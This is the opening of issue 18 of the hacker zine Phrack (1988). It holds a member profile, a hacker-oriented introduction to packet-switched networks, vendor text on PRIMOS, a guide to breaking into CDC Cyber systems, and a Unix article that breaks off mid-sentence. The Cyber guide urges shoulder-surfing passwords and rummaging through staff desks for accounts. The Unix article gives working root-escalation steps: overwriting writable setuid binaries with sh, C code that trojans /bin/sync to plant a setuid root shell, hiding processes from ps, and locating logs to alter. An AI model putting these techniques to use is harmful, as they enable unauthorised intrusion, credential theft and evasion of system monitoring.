==Phrack Inc.== Volume Two, Issue 18, Phile #1 of 11 Index ===== June 7, 1988 Well, Phrack Inc. is still alive but have changed editors again. I, Crimson Death am now the new editor of Phrack Inc. The reason why I am the new editor is because of the previous editors in school and they did not just have the time for it. So, if you would like to submit an article for Phrack Inc. please contact: Crimson Death, Control C, or Epsilon, or call my BBS (The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in PWN Part 1). We are ALWAYS looking for more files to put in upcoming issues. Well, that about does it for me. I hope you enjoy Phrack 18 as much as we at The Forgotten Realm did bringing it to you. Later... Crimson Death Sysop of The Forgotten Realm ------------------------------------------------------------------------------ This issue of Phrack Inc. includes the following: #1 Index of Phrack 18 by Crimson Death (02k) #2 Pro-Phile XI on Ax Murderer by Crimson Death (04k) #3 An Introduction to Packet Switched Networks by Epsilon (12k) #4 Primos: Primenet, RJE, DPTX by Magic Hasan (15k) #5 Hacking CDC's Cyber by Phrozen Ghost (12k) #6 Unix for the Moderate by Urvile (11k) #7 Unix System Security Issues by Jester Sluggo (27k) #8 Loop Maintenance Operating System by Control C (32k) #9 A Few Things About Networks by Prime Suspect (21k) #10 Phrack World News XVIII Part I by Epsilon (09k) #11 Phrack World News XVIII Part II by Epsilon (05k) ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #2 of 11 ==Phrack Pro-Phile XI== Written and Created by Crimson Death Welcome to Phrack Pro-Phile XI. Phrack Pro-Phile is created to bring info to you, the users, about old or highly important/controversial people. This month, I bring to you a name familiar to most in the BBS world... Ax Murderer =========== Ax Murderer is popular to many of stronger names in the P/H community. ------------------------------------------------------------------------------ Personal ======== Handle: Ax Murderer Call him: Mike Past handles: None Handle origin: Thought of it while on CompuServe. Date of Birth: 10/04/72 Age at current date: 15 Height: 6' 2'' Weight: 205 Lbs. Eye color: Brown Hair Color: Brown Computers: IBM PC, Apple II+, Apple IIe Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn ------------------------------------------------------------------------------ Ax Murderer started phreaking and hacking in 1983 through the help of some of his friends. Members of the Hack/Phreak world which he has met include Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn, Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland. His phreaking and hacking knowledge came about with a group of people in which some included Forest Ranger and The Timelord. Ax Murderer is a little more interested in Phreaking than hacking. He does like to program however, he can program in 'C', Basic, Pascal, and Machine Language. The only group in which Ax Murderer has been in is Phoneline Phantoms. ------------------------------------------------------------------------------ Interests: Telecommunications (Modeming, phreaking, hacking, programming), football, track, cars, and music. Ax Murderer's Favorite Thing ---------------------------- His car... (A Buick Grand National) His gilrfriend... (Sue) Rock Music Most Memorable Experiences -------------------------- Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial) Some People to Mention ---------------------- Forest Ranger (For introducing me to everyone and getting me on Dragon Fire) Taran King (For giving me a chance on MSP and the P/H world) Mind Bender (For having ANY utilities I ever needed) The Necromancer (Getting me my Apple'cat) The Titan (Helping me program the BBS) All for being friends and all around good people and phreaks. ------------------------------------------------------------------------------ Ax Murderer is out and out against the idea of the destruction of data. He hated the incident with MIT where the hackers were just hacking it to destroy files on the system. He says that it ruins it for the everyone else and gives 'True Hackers' a bad name. He hates it when people hack to destroy, Ax has no respect for anyone who does this today. Where have all the good times gone? ------------------------------------------------------------------------------ I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in the near future.... And now for the regularly taken poll from all interviewees. Of the general population of phreaks you have met, would you consider most phreaks, if any, to be computer geeks? "No, not really." Thanks Mike. Crimson Death Sysop of The Forgotten Realm ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #3 of 11 _ _ _ _ _____________________________________________ _ _ _ _ _-_-_-_- -_-_-_-_ _-_-_-_- An Introduction To -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- Packet Switched Networks -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- Written By - Revised - -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- Epsilon 05/3/88 -_-_-_-_ _-_-_-_-_____________________________________________-_-_-_-_ Preface - In the past few years, Packet Switched Networks have become a prominent feature in the world of telecommunications. These networks have provided ways of communicating with virtually error-free data, over very large distances. These networks have become an imperative to many a corporation in the business world. In this file we will review some of the basic aspects of Packet Switched Networks. Advantages - The Packet Switched Network has many advantages to the common user, and even more to the hacker, which will be reviewed in the next topic. The basis of a Packet Switched Network is the Packet Switch. This network enables the service user to connect to any number of hosts via a local POTS dial-up/port. The various hosts pay to be connected to this type of network, and that's why there is often a surcharge for connection to larger public services like Compuserve or The Source. A Packet Switched Network provides efficient data transfer and lower rates than normal circuit switched calls, which can be a great convenience if you are planning to do a lot of transferring of files between you and the host. Not only is the communication efficient, it is virtually error free. Whereas in normal circuit switched calls, there could be a drastic increase in errors, thus creating a bad transfer of data. When using a Packet Switched Network, it is not important that you communicate at the same baud rate as your host. A special device regulates the speed so that the individual packets are sped up or slowed down, according to your equipment. Such a device is called a PAD (Packet Assembler Disassembler). A PSN also provides access to a variety of information and news retrieval services. The user pays nothing for these calls, because the connections are collect. Although the user may have to subscribe to the service to take advantage of it's services, the connection is usually free, except for a surcharge on some of the larger subscription services. Advantages To Hackers - Packet Switched Networks, to me, are the best thing to come along since the phone system. I'm sure many other hackers feel the same way. One of the reasons for this opinion is that when hacking a system, you need not dial out of your LATA, using codes or otherwise. Now, the hacker no longer has to figure out what parameters he has to set his equipment to, to communicate with a target computer effectively. All PSSes use the same protocol, set by international standards. This protocol is called X.25. This protocol is used on every network-to-network call in the world. When operating on a packet switch, you are not only limited to your own network (As if that wasn't enough already). You can access other PSSes or private data networks through gateways which are implemented in your PSN. There are gateways to virtually every network, from virtually every other network, except for extremely sensitive or private networks, in which case would probably be completely isolated from remote access. Another advantage with PSNs is that almost everyone has a local port, which means if you have an outdial (Next paragraph), you can access regular circuit switched hosts via your local Packet Switched Network port. Since the ports are local, you can spend as much time as you want on it for absolutely no cost. So think about it. Access to any feasible network, including overseas PSNs and packet switches, access to almost any host, access to normal circuit switched telephone-reachable hosts via an outdial, and with an NUI (Network User Identity - Login and password entered at the @ prompt on Telenet), unlimited access to any NUA, reverse-charged or not. Due to the recent abuse of long distance companies, the use of codes when making free calls is getting to be more and more hazardous. You may ask, 'Is there any resort to making free calls without using codes, and without using a blue box?' The answer is yes, but only when using data. With an outdial, accessible from your local PSN port, you can make data calls with a remote modem, almost always connected directly to a server, or a port selector. This method of communicating is more efficient, safer, and more reliable than using any code. Besides, with the implementation of equal access, and the elimination of 950 ports, what choice will you have? Some Important Networks - As aforementioned, PSNs are not only used in the United States. They are all over the place. In Europe, Asia, Canada, Africa, etc. This is a small summary of some of the more popular PSNs around the world. Country Network Name *DNIC ~~~~~~~ ~~~~~~~ ~~~~ ~~~~ Germany Datex-P 2624 Canada Datapac 3020 Italy Datex-P 0222 South Africa Saponet 0655 Japan Venus-P 4408 England Janet/PSS 2342 USA Tymnet 3106 USA Telenet 3110 USA Autonet 3126 USA RCA 3113 Australia Austpac 0505 Ireland Irepac 2724 Luxembourg Luxpac 2704 Singapore Telepac 5252 France Transpac 2080 Switzerland Telepac 2284 Sweden Telepac 2405 Israel Isranet 4251 ~~~~~~~~~ ~~~~~~~ ~~~~ * - DNIC (Data Network Identification Code) Precede DNIC and logical address with a '0' when using Telenet. ______________________________________________________________________________ Notes On Above Networks - Some countries may have more than one Packet Switching Network. The ones listed are the more significant networks for each country. For example, the United States has eleven public Packet Switching Networks, but the four I listed are the major ones. Several countries may also share one network, as shown above. Each country will have equal access to the network using the basic POTS dial-up ports. Focus On Telenet - Since Telenet is one of the most famous, and highly used PSNs in the United States, I thought that informing you of some of the more interesting aspects of this network would be beneficial. Interconnections With Other Network Types - Packet Switched Networks are not the only type of networks which connect a large capacity of hosts together. There are also Wide Area Networks, which operate on a continuous link basis, rather than a packet switched basis. These networks do not use the standardized X.25 protocol, and can only be reached by direct dial-ups, or by connecting to a host which has network access permissions. The point is, that if you wanted to reach, say, Arpanet from Telenet, you would have to have access to a host which is connected to both networks. This way, you can connect to the target host computer via Telenet, and use the WAN via the target host. WANs aren't the only other networks you can access. Also, connections to other small, private, interoffice LANs are quite common and quite feasible. Connections To International NUAs via NUIs - When using an NUI, at the prompt, type 0+DNIC+NUA. After your connection is established, proceed to use the system you've reached. Private Data Networks - Within the large Packet Switched Networks that are accessible to us there are also smaller private networks. These networks can sometimes be very interesting as they may contain many different systems. A way to identify a private network is by looking at the three digit prefix. Most prefixes accessible by Telenet are based on area codes. Private networks often have a prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144) Those prefixes are not real networks, just examples. Inside these private networks, there are often smaller networks which are connected with some type of host selector or gateway server. If you find something like this, there may be hosts that can be accessed only by this port selector/server, and not by the normal prefix. It is best to find out what these other addresses translate to, in case you are not able to access the server for some reason. That way, you always have a backup method of reaching the target system (Usually the addresses that are accessed by a gateway server/port selector translate to normal NUAs accessible from your Telenet port). When exploring a private network, keep in mind that since these networks are smaller, they would most likely be watched more closely during business hours then say Telenet or Tymnet. Try to keep your scanning and tinkering down to a minimum on business hours to avoid any unnecessary trouble. Remember, things tend to last longer if you don't abuse the hell out of them. Summary - I hope this file helped you out a bit, and at least gave you a general idea of what PSNs are used for, and some of the advantages of using these networks. If you can find something interesting during your explorations of PSNs, or Private Data Networks, share it, and spread the knowledge around. Definitely exploit what you've found, and use it to your advantage, but don't abuse it. If you have any questions or comments, you reach me on - The FreeWorld II/Central Office/Forgotten Realm/TOP. I hope you enjoyed my file. Thanks for your time. I should be writing a follow up article to this one as soon as I can. Stay safe.. - Epsilon ______________________________________________________________________________ - Thanks To - Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist ______________________________________________________________________________ ==Phrack Inc.== Volume Two, Issue 18, Phile #4 of 11 ------------------------------------------------------------------------- - - - - - PRIMOS: - - NETWORK COMMUNICATIONS - - - - PRIMENET, RJE, DPTX - - - - - - Presented by Magic Hasan June 1988 - ------------------------------------------------------------------------- PRIME's uniform operating system, PRIMOS, supports a wide range of communications products to suit any distributed processing need. The PRIMENET distributed networking facility provides complete local and remote network communication services for all PRIME systems. PRIME's Remote Job Entry (RJE) products enable multi-user PRIME systems to emulate IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over synchronous communication lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users to construct communication networks with PRIME and IBM-compatible equipment. PRIMENET -------- PRIMENET provides complete local and remote network communication services for all PRIME systems. PRIMENET networking software lets a user or process on one PRIME system communicate with any other PRIME system in the network without concern for any protocol details. A user can log in to any computer in the network from any terminal in the network. With PRIMENET, networking software processes running concurrently on different systems can communicate interactively. PRIMENET allows transparent access to any system in the network without burdening the user with extra commands. PRIMENET has been designed and implemented so that user interface is simple and transparent. Running on a remote system from a local node of the network or accessing remote files requires no reprogramming of user applications or extensive user training. All the intricacies and communication protocols of the network are handled by the PRIMENET software. For both the local and remote networks, PRIMENET will allow users to share documents, files, and programs and use any disk or printer configured in the network. For a local network between physically adjacent systems, PRIME offers the high-performance microprocessor, the PRIMENET Node Controller (PNC). The controller users direct memory access for low overhead and allows loosely coupled nodes to share resources in an efficient manner. The PNCs for each system are connected to each other with a coaxial cable to form a high-speed ring network, with up to 750 feet (230 meters) between any two systems. Any system in the PNC ring can establish virtual circuits with any other system, making PNC-based networks "fully connected" with a direct path between each pair of systems. The ring has sufficient bandwidth (1 MB per second) and addressing capability to accommodate over 200 systems in a ring structure; however, PRIMENET currently supports up to sixteen systems on a ring to operate as a single local network. The PRIMENET Node Controller is designed to assure continuity of operation in the event that one of the systems fails. One system can be removed from the network or restored to on-line status without disturbing the operations of the other system. An active node is unaware of messages destined for other nodes in the network, and the CPU is notified only when a message for that node has been correctly received. Synchronous communications over dedicated leased lines or dial-up lines is provided through the Multiple Data Link Controller (MDLC). This controller handles certain protocol formatting and data transfer functions normally performed by the operating system in other computers. The controller's microprogrammed architecture increases throughput by eliminating many tasks from central processor overhead. The communications controller also supports multiple protocols for packet-switched communications with Public Data Networks such as the United States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's International Packet Switching Service (IPSS), France's TRANSPAC, and the European Packet Switching Network, EURONET. Most Public Data Networks require computers to use the CCITT X.25 protocol to deal with the management of virtual circuits between a system and others in the network. The synchronous communications controller supports this protocol. PRIME can provide the X.25 protocol for use with the PRIMENET networking software without modification to the existing hardware configuration. PRIMENET software offers three distinct sets of services. The Inter-Program Communication Facility (IPCF) lets programs running under the PRIMOS operating system establish communications paths (Virtual circuits) to programs in the same or another PRIME system, or in other vendors' systems supporting the CCITT X.25 standard for packet switching networks. The Interactive Terminal Support (ITS) facility permits terminals attached to a packet switching network, or to another PRIME system, to log-in to a PRIME system with the same capabilities they would have if they were directly attached to the system. The File Access Manager (FAM) allows terminal users or programs running under the PRIMOS operating system to utilize files physically stored on other PRIME systems in a network. Remote file operations are logically transparent to the application program. This means no new applications and commands need to be learned for network operation. The IPCF facility allows programs in a PRIME computer to exchange data with programs in the same computer, another PRIME computer, or another vendor's computer, assuming that that vendor supports X.25. This feature is the most flexible and powerful one that any network software package can provide. It basically allows an applications programmer to split up a program, so that different pieces of the program execute on different machines a network. Each program component can be located close to the resource (terminals, data, special peripherals, etc.) it must handle, decode the various pieces and exchange data as needed, using whatever message formats the application designer deems appropriate. The programmer sees PRIMENET's IPCF as a series of pipes through which data can flow. The mechanics of how the data flows are invisible; it just "happens" when the appropriate services are requested. If the two programs happen to end up on the same machine, the IPCF mechanism still works. The IPCF offers the following advantages: 1) The User does not need to understand the detailed mechanisms of communications software in order to communicate. 2) Calls are device-independent. The same program will work over physical links implemented by the local node controller (local network), leased lines, or a packet network. 3) Programs on one system can concurrently communicate with programs on other systems using a single communications controller. PRIMENET handles all multiplexing of communications facilities. 4) A single program can establish multiple virtual circuits to other programs in the network. PRIMENET's ITS facility allows an interactive terminal to have access to any machine in the network. This means that terminals can be connected into an X.25 packet network along with PRIME computers. Terminal traffic between two systems is multiplexed over the same physical facilities as inter-program data, so no additional hardware is needed to share terminals between systems. This feature is ordinarily invisible to user programs, which cannot distinguish data entering via a packet network from data coming in over AMLC lines. A variant of the IPCF facility allows users to include the terminal handling protocol code in their own virtual space, thus enabling them to control multiple terminals on the packet network within one program. Terminals entering PRIMOS in this fashion do not pass through the usual log-in facility, but are immediately connected to the application program they request. (The application program provides whatever security checking is required.) The result is the most effective available means to provide multi-system access to a single terminal, with much lower costs for data communications and a network which is truly available to all users without the expense of building a complicated private network of multiplexors and concentrators. By utilizing PRIMENET's File Access Manager (FAM), programs running under PRIMOS can access files on other PRIME systems using the same mechanisms used to access local files. This feature allows users to move from a single-system environment to a multiple-system one without difficulty. When a program and the files it uses are separated into two (or more) systems the File Access Management (FAM)is automatically called upon whenever the program attempts to use the file. Remote file operations are logically transparent to the user or program. When a request to locate a file or directory cannot be satisfied locally, the File Access Manager is invoked to find the data elsewhere in the network. PRIMOS initiates a remote procedure call to the remote system and suspends the user. This procedure call is received by an answering slave process on the remote system, which performs the requested operation and returns data via subroutine parameters. The slave process on the remote system is dedicated to its calling master process (user) on the local system until released. A master process (user) can have a slave process on each of several remote systems simultaneously. This means that each user has a dedicated connection for the duration of the remote access activity so many requests can be handled in parallel. FAM operation is independent of the specific network hardware connecting the nodes. There is no need to rewrite programs or learn new commands when moving to the network environment. Furthermore, the user need only be logged-in to one system in the network, regardless of the location of the file. Files on the local system or remote systems can be accessed dynamically by file name within a program, using the language-specific open and close statements. No external job control language statements are needed for the program to access files. Inter-host file transfers and editing can be performed using the same PRIMOS utilities within the local system by referencing the remote files with their actual file names. REMOTE JOB ENTRY ---------------- PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over synchronous communication lines. PRIME's RJE provides the same communications and peripheral support as the RJE terminals they emulate, appearing to the host processor to be those terminals. All PRIME RJE products provide three unique benefits: * PRIME RJE is designed to communicate with multiple remote sites simultaneously. * PRIME RJE enables any terminal connected to a PRIME system to submit jobs for transmission to remote processors, eliminating the requirement for dedicated terminals or RJE stations at each location. * PRIME's mainframe capabilities permit concurrent running of RJE emulators, program development and production work. PRIME's RJE supports half-duplex, point-to-point, synchronous communications and operates over dial-up and dedicated lines. It is fully supported by the PRIMOS operating system. DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX) ------------------------------------------------ PRIME's Distributed Processing Terminal Executive (DPTX) allows users to construct communication networks with PRIME and IBM-compatible equipment. DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated into networks containing IBM mainframes, terminals and printers without changing application code or access methods and operates under the PRIMOS operating system. DPTX is compatible with all IBM 370 systems and a variety of access methods and teleprocessing monitors: BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO. They provide transmission speeds up to 9600 bps using IBM's Binary Synchronous Communications (BSC) protocol. DPTX is comprised of three software modules that allow PRIME systems to emulate and support IBM or IBM compatible 3271/3277 Display Systems. One module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to emulate the operation of a 3271 on the IBM system. This enables both terminal user and application programs (interactive or batch) on the PRIME System to reach application programs on an IBM mainframe. A second module, Terminal Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM 3271/3277 devices. This enables terminal users to reach application programs on a PRIME computer. The third module, Transparent Connect Facility (DPTX/TCF), combines the functions of modules one and two with additional software allowing 3277 terminal users to to reach programs on a IBM mainframe, even though the terminal subsystem is physically connected to a PRIME system, which is connected to an IBM system. PRIMOS offers a variety of different Communication applications. Being able to utilize these applications to their fullest extent can make life easy for a Primos "enthusiast." If you're a beginner with Primos, the best way to learn more, as with any other system, is to get some "hands-on" experience. Look forward to seeing some beginner PRIMOS files in the near future. -MH ------------------------------------------------------------------------------ Special thanks to PRIME INC. for unwittingly providing the text for this article. =============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #5 of 11 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= =- -= Hacking Control Data Corporation's Cyber =- -= =- -= Written by Phrozen Ghost, April 23, 1988 =- -= =- -= Exclusively for Phrack Magazine =- -= =- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This article will cover getting into and using NOS (Networking Operating System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run this operating system so I will just refer to this environ- ment as Cyber. Also, Cyber is a slow and outdated operating system that is primarily used only for college campuses for running compilers. First off after you have scanned a bunch of carriers you will need to know how Cyber identifies itself. It goes like this: WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987. 88/02/16. 02.36.53. N265100 CSUS CYBER 170-730. NOS 2.5.2-678/3. FAMILY: You would normally just hit return at the family prompt. Next prompt is: USER NAME: Usernames are in the format abcdxxx where a is the location of where the account is being used from (A-Z). the b is a grouping specifying privs and limits for the account- usually A-G -where A is the lowest access. Some examples of how they would be used in a college system: A = lowest access - class accounts for students B = slightly higher than A (for students working on large projects) C = Much higher limits, these accounts are usually not too hard to get and they will normally last a long time! Lab assistants use these. D = Instructors, Lecturers, Professors.. etc.. E = same... (very hard to get these!) The C and D positions are usually constant according to the groupings. For example, a class would have accounts ranging from NADRAAA-AZZ ^^^ ^^^ These can also be digits There are also special operator accounts which start with digits instead of numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor which can observe any tty connected to the system... The next prompt will be for the password, student account passwords cannot be changed and are 7 random letters by default, other account passwords can be changed. You get 3 tries until you are logged out. It is very difficult if not impossible to use a brute force hacker or try to guess someone's account.. so how do you get on? Here's one easy way... Go down to your local college (make sure they have a Cyber computer!) then just buy a class catalog (they only cost around 50 cents) or you could look, borrow, steal someone else's... then find a pascal or fortran class that fits your schedule! You will only have to attend the class 3 or 4 times max. Once you get there you should have no trouble, but if the instructor asks you questions about why you are not on the roll, just tell him that you are auditing the class (taking it without enrolling so it won't affect your GPA). The instructor will usually pass out accounts on the 3rd or 4th day of class.. this method also works well with just about any system they have on campus! Another way to get accounts is to go down to the computer lab and start snooping! Look over someone's shoulder while they type in their password, or look thru someone's papers while they're in the bathroom, or look thru the assistants desk while he is helping someone... (I have acquired accounts both ways, and the first way is a lot easier with less hassles) Also, you can use commas instead of returns when entering username and password. Example: at the family prompt, you could type ,nadrajf,dsfgkcd or at the username prompt nadrajf,dsfgkcd After you enter your info, the system will respond with: JSN: APXV, NAMIAF / The 'APXV, NAMIAF' could be different depending on what job you were attached to. The help program looks a lot neater if you have vt100 emulation, if you do, type [screen,vt100] (don't type the brackets! from now on, all commands I refer to will be enclosed in brackets) Then type help for an extensive tutorial or a list of commands. Your best bet at this point is to buy a quick reference guide at the campus because I am only going to describe the most useful commands. The / means you are in the batch subsystem, there are usually 6 or 7 other subsystems like basic, fortran, etc... return to batch mode by typing [batch]. Some useful commands: CATLIST - will show permanent files in your directory. ENQUIRE,F - displays temporary files in your workspace. LIMITS - displays your privileges. INFO - get more on-line help. R - re-execute last command. GET,fn - loads fn into the local file area. CHANGE - change certain specs on a file. PERMIT - allow other users to use one of your files. REWIND,* - rewinds all your local files. NEW,fn - creates new file. PURGE - deletes files. LIST,F=fn - list file. UPROC - create an auto-execute procedure file. MAIL - send/receive private mail. BYE - logoff. Use the [helpme,cmd] command for the exact syntax and parameters of these commands. There are also several machine specific 'application' programs such as pascal, fortran, spitbol, millions of others that you can look up with the INFO command... there are also the text editors; edit, xedit, and fse (full screen editor). Xedit is the easiest to use if you are not at a Telray 1061 terminal and it has full documentation. Simply type [xedit,fn] to edit the file 'fn'. Special control characters used with Cyber: Control S and Control Q work normally, the terminate character is Control T followed by a carriage return. If you wanted to break out of an auto-execute login program, you would have to hit ^T C/R very fast and repetitively in order to break into the batch subsystem. Control Z is used to set environment variables and execute special low level commands, example: [^Z TM C/R] this will terminate your connection... So now you're thinking, what the hell is Cyber good for? Well, they won't have any phone company records, and you can't get credit information from one, and I am not going to tell you how to crash it since crashing systems is a sin. There are uses for a Cyber though, one handy use is to set up a chat system, as there are normally 30-40 lines going into a large university Cyber system. I have the source for a chat program called the communicator that I will be releasing soon. Another use is some kind of underground information exchange that people frequently set up on other systems, this can easily be done with Cyber. Procedure files: A procedure file is similar to a batch file for MS-DOS, and a shell script for UNIX. You can make a procedure file auto-execute by using the UPROC command like [uproc,auto] will make the file 'auto', auto execute. There is also a special procedure file called the procfile in which any procedure may be accessed by simply a - in front of it. If your procfile read: .proc,cn. .* sample procedure $catlist/un=7etpdoc. $exit. then you could simply type -cn and the / prompt and it would execute the catlist command. Now back to uprocs, you could easily write a whole BBS in a procedure file or say you wanted to run a chat system and you did not want people to change the password on your account, you could do this: .proc,chat, PW"Password: "=(*A). $ife,PW="cyber",yes. $chat. $revert. $bye. $else,yes. $note./Wrong password, try again/. $revert. $bye. $endif,yes. This procedure will ask the user for a password and if he doesn't type "cyber" he will be logged off. If he does get it right then he will be dumped into the chat program and as soon as he exits the chat program, he will be logged off. This way, the user cannot get into the batch subsystem and change your password or otherwise screw around with the account. The following is a listing of the procfil that I use on my local system, it has a lot of handy utilities and examples... ---- cut here ---- .PROC,B. .******BYE****** $DAYFILE. $NOTE.////////////////////////// $ASCII. $BYE. $REVERT,NOLIST. #EOR .PROC,TIME. .******GIVES DAY AND TIME****** $NOTE./THE CURRENT DAY AND TIME IS/ $FIND,CLOCK./ $REVERT,NOLIST. #EOR .PROC,SIGN*I,IN. .******SIGN PRINT UTILITY******. $GET,IN. $FIND,SIGN,#I=IN,#L=OUT. $NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/ $REVERT,NOLIST. #EOR .PROC,TA. .******TALK****** $SACFIND,AID,COMM. $REVERT,NOLIST. #EOR .PROC,DIR,UN=,FILE=. .******DIRECTORY LISTING OF PERMANENT FILES****** $GET(ZZZZDIR=CAT/#UN=1GTL0CL) ZZZZDIR(FILE,#UN=UN) $RETURN(ZZZZDIR) $REVERT,NOLIST. #EOR .PROC,Z19. .******SET SCREEN TO Z19****** $SCREEN,Z19. $NOTE./SCREEN,Z19. $REVERT,NOLIST. #EOR .PROC,VT. .******SET SCREEN TO VT100****** $SCREEN,VT100. $NOTE./SCREEN,VT100. $REVERT,NOLIST #EOR .PROC,SC. .******SET SCREEN TO T10****** $SCREEN,T10. $NOTE./SCREEN,T10. $REVERT,NOLIST #EOR .PROC,C. .******CATLIST****** $CATLIST. $REVERT,NOLIST. #EOR .PROC,CA. .******CATLIST,LO=F****** $CATLIST,LO=F. $REVERT,NOLIST. #EOR .PROC,MT. .******BBS****** $SACFIND,AID,MTAB. $REVERT,NOLIST. #EOR .PROC,LI,FILE=. .******LIST FILE****** $GET,FILE. $ASCII. $COPY(FILE) $REVERT. $EXIT. $CSET(NORMAL) $REVERT,NOLIST. WHERE IS THAT FILE?? #EOR .PROC,LOCAL. .******DIRECTORY OF LOCAL FILES****** $RETURN(PROCLIB,YYYYBAD,YYYYPRC) $GET(QQQFILE=ENQF/UN=1GTL0CL) QQQFILE. $REVERT,NOLIST. $EXIT. $REVERT. FILES ERROR #EOR .PROC,RL. .******RAISE LIMITS****** $SETASL(*) $SETJSL(*) $SETTL(*) $CSET(ASCII) $NOTE./ Limits now at max validated levels. $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,CL. .******CLEAR****** $CLEAR,*. $CSET(ASCII) $NOTE./LOCAL FILE AREA CLEARED $REVERT,NOLIST. #EOR .PROC,P,FILE=THING,LST=LIST. .*********************************************************** $CLEAR. $GET(FILE) $PASCAL4,FILE,LST. $REVERT. $EXIT. $REWIND,*. $CSET(ASCII) $COPY(LIST) $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,RE. .******REWIND****** $REWIND,*. $CSET(ASCII) $NOTE./REWOUND. $REVERT,NOLIST. #EOR .PROC,FOR,FILE,LST=LIST. .******************************************************************** $CLEAR. $GET(FILE) $FTN5,I=FILE,L=LST. $REPLACE(LST=L) $CSET(ASCII) $REVERT. Fortran Compiled $EXIT. $REWIND,*. $COPY(LST) $REVERT. That's all folks. #EOR .PROC,WAR. .******WARBLES****** $SACFIND,AID,WAR. $REVERT,NOLIST. #EOR .PROC,M. .******MAIL/CHECK****** $MAIL/CHECK. $REVERT,NOLIST. #EOR .PROC,MA. .******ENTER MAIL****** $MAIL. $REVERT,NOLIST. #EOR .PROC,HE,FILE=SUMPROC,UN=. .******HELP FILE****** $GET,FILE/#UN=UN. $COPY(FILE) $REVERT. $EXIT. $REVERT,NOLIST. #EOR .PROC,DYNAMO. .******WHO KNOWS??****** $GET,DYNMEXP/UN=7ETPDOC. $SKIPR,DYNMEXP. $COPYBR,DYNMEXP,GO. $FIND,DYNAMO,GO. $REVERT,NOLIST. #EOR #EOR #EOI ---- cut here ---- I have covered procfil's fairly extensively as I think it is the most useful function of Cyber for hackers. I will be releasing source codes for several programs including 'the communicator' chat utility, and a BBS program with a full message base. If you have any questions about Cyber or you have gotten into one and don't know what to do, I can be contacted at the Forgotten Realm BBS or via UUCP mail at ...!uunet!ncoast!ghost. Phrozen Ghost =============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #6 of 11 ------------------------------------------------------------------------------ Unix for the Moderate ------------------------------------------------------------------------------- By: The Urvile, Necron 99, and a host of me. ------------------------------------------------------------------------------- Disclaimer: This is mainly for system five. I do reference BSD occasionally, but I mark those. All those little weird brands (i.e., DEC's Ultrix, Xenix, and so on) can go to hell. Security: (Improving yours.) -Whenever logging onto a system, you should always do the following: $ who -u $ ps -ef $ ps -u root or BSD: $ who; w; ps uaxg This prints out who is on, who is active, what is going on presently, everything in the background, and so on. And the ever popular: $ find / -name "*log*" -print This lists out all the files with the name 'log' in it. If you do find a process that is logging what you do, or an odd log file, change it as soon as you can. If you think someone may be looking at you and you don't want to leave (Useful for school computers) then go into something that allows shell breaks, or use redirection to your advantage: $ cat < /etc/passwd That puts 'cat' on the ps, not 'cat /etc/passwd'. If you're running a setuid process, and don't want it to show up on a ps (Not a very nice thing to have happen), then: $ super_shell # exec sh Runs the setuid shell (super_shell) and puts something 'over' it. You may also want to run 'sh' again if you are nervous, because if you break out of an exec'ed process, you die. Neat, huh? Improving your id: -First on, you should issue the command 'id' & it will tell you you your uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your id [whoami] and your euid [ls -l].), terribly useful for checking on setuid programs to see if you have root euid privs. Also, do this: $ find / -perm -4000 -exec /bin/ls -lad {} ";" Yes, this finds and does an extended list of all the files that have the setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of them look nonstandard, play with them, you never can tell what a ^| will do to them sometimes. Also, if any are writeable and executable, copy sh over them, and you'll have a setuid root shell. Just be sure to copy whatever was there back, otherwise your stay will probably be shortened a bit. -What, you have the bin passwd? Well, game over. You have control of the system. Everything in the bin directory is owned by bin (with the exception of a few things), so you can modify them at will. Since cron executes a few programs as root every once in a while, such as /bin/sync, try this: main() { if (getuid()==0 || getuid()==0) { system("cp /bin/sh /tmp/sroot"); system("chmod 4777 /tmp/sroot"); } sync(); } $ cc file.c $ cp /bin/sync /tmp/sync.old $ mv a.out /bin/sync $ rm file.c Now, as soon as cron runs /bin/sync, you'll have a setuid shell in /tmp/sroot. Feel free to hide it. -the 'at' & 'cron' commands: Look at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at' (check by typing 'at'), and 'lasttimedone' is writable, then: submit a blank 'at' job, edit 'lastimedone' to do what you want it to do, and move lasttimedone over your entry (like 88.00.00.00). Then the commands you put in 